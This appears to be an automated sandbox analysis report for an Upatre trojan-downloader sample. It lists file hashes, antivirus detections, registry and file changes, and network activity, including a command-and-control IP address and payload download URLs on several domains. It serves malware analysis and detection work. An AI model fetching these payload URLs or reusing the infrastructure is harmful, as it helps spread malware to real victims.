Analysis Date: 2015-07-30 12:21:20
MD5: 8690d8d1d06ee542daa16ad95b291870
SHA1: 7ec02730faad6adf956865ce150b1afa8188a36d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 05c17476dc7fab28004ba68af29bb1d7 sha1: 845d7c8fea7f587ae413af3c78ff341cba25fd9b size: 5632
Section .rdata: md5: 26152a784fee026e4fe92cb200eb1ebb sha1: adc8d3b3d3ba885edf1780b730f64dbe4c84d187 size: 1024
Section .data: md5: 7d23f1118c411b38b1a890c5bc38b5fa sha1: 6dfd596733c90d10f8ef201a1da3cd7a06c48e2d size: 512
Section .rsrc: md5: d1e12d22cd17c0c13ed9968d81066ea0 sha1: b65c4ca121c9e78b66b626bbca4d084750087aee size: 11776
Timestamp: 2071-10-05 02:57:52
Version
LegalCopyright: Copyright by FASTER Inc.
InternalName: FASTER
FileVersion: Version 0.1.8
CompanyName: FASTER
FileDescription: FASTER company
OriginalFilename: FASTER
PEhash: b21987e6d945d2cda9d5a11fa83dcd67d4262ab7
IMPhash: a79387d1faab93d53469d6b3d5b2f4f3
AV Rising: Trojan.DL.Win32.Upatre.aaq
AV CA (E-Trust Ino): Win32/Tnega.AWTW
AV F-Secure: Trojan-Downloader:W32/Upatre.E
AV Dr. Web: Trojan.Upatre.87
AV ClamAV: Win.Trojan.Generickd-991
AV Arcabit (arcavir): Trojan.GenericKD.1889168
AV BullGuard: Trojan.GenericKD.1889168
AV Padvish: no_virus
AV VirusBlokAda (vba32): TrojanDownloader.Upatre
AV CAT (quickheal): TrojanDwnldr.Upatre.AA4
AV Trend Micro: TROJ_UPATRE.SM37
AV Kaspersky: Trojan-Downloader.Win32.Upatre.bja
AV Zillya!: Downloader.Upatre.Win32.28
AV Emsisoft: Trojan.GenericKD.1889168
AV Ikarus: Trojan-Downloader.Win32.Upatre
AV Frisk (f-prot): W32/Trojan3.KZK
AV Authentium: W32/Trojan.MNKK-0737
AV MalwareBytes: Trojan.Downloader.upt
AV MicroWorld (escan): Trojan.GenericKD.1889168
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre
AV K7: Trojan-Downloader ( 0048f6391 )
AV BitDefender: Trojan.GenericKD.1889168
AV Fortinet: W32/Kryptik.CLXC!tr
AV Symantec: Trojan.Zbot
AV Grisoft (avg): Crypt3.ARXQ
AV Eset (nod32): Win32/TrojanDownloader.Waski.A
AV Alwil (avast): Upatre-E [Trj]
AV Ad-Aware: Trojan.GenericKD.1889168
AV Twister: TrojanDldr.Upatre.bja.izog
AV Avira (antivir): TR/Crypt.ZPACK.100953
AV Mcafee: Downloader-FSH!8690D8D1D06E

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\zstmx.exe
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\zstmx.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\zstmx.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: mosaikglobal.com
Winsock DNS: surveying.nl
Winsock DNS: 188.165.198.52
Winsock DNS: galeriesylvia.net
Winsock DNS: dsmfrance.com

Network Details:

DNS dsmfrance.com (Type: A) ➝ 213.186.33.17
DNS surveying.nl (Type: A) ➝ 213.188.130.108
DNS galeriesylvia.net (Type: A) ➝ 81.88.57.68
DNS mosaikglobal.com (Type: A)
HTTP GET http://188.165.198.52:31008/2909us/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0
HTTP GET http://188.165.198.52:31008/2909us/COMPUTER-XXXXXX/1/0/0/
User-Agent: Mozilla/5.0
HTTP GET http://188.165.198.52:31008/2909inst/COMPUTER-XXXXXX/1/0/0/
User-Agent: Mozilla/5.0
HTTP GET http://dsmfrance.com/css/2909uk5.rar
User-Agent: Mozilla/5.0
HTTP GET http://surveying.nl/script/2909uk5.rar
User-Agent: Mozilla/5.0
HTTP GET http://galeriesylvia.net/scripts/install4.tar
User-Agent: Mozilla/5.0
HTTP GET http://dsmfrance.com/css/2909uk5.rar
User-Agent: Mozilla/5.0
HTTP GET http://surveying.nl/script/2909uk5.rar
User-Agent: Mozilla/5.0
Flows TCP 192.168.1.1:1031 ➝ 188.165.198.52:31008
Flows TCP 192.168.1.1:1031 ➝ 188.165.198.52:31008
Flows TCP 192.168.1.1:1032 ➝ 188.165.198.52:31008
Flows TCP 192.168.1.1:1033 ➝ 188.165.198.52:31008
Flows TCP 192.168.1.1:1034 ➝ 213.186.33.17:80
Flows TCP 192.168.1.1:1035 ➝ 213.188.130.108:80
Flows TCP 192.168.1.1:1036 ➝ 81.88.57.68:80
Flows TCP 192.168.1.1:1037 ➝ 213.186.33.17:80
Flows TCP 192.168.1.1:1038 ➝ 213.188.130.108:80

Raw Pcap


Strings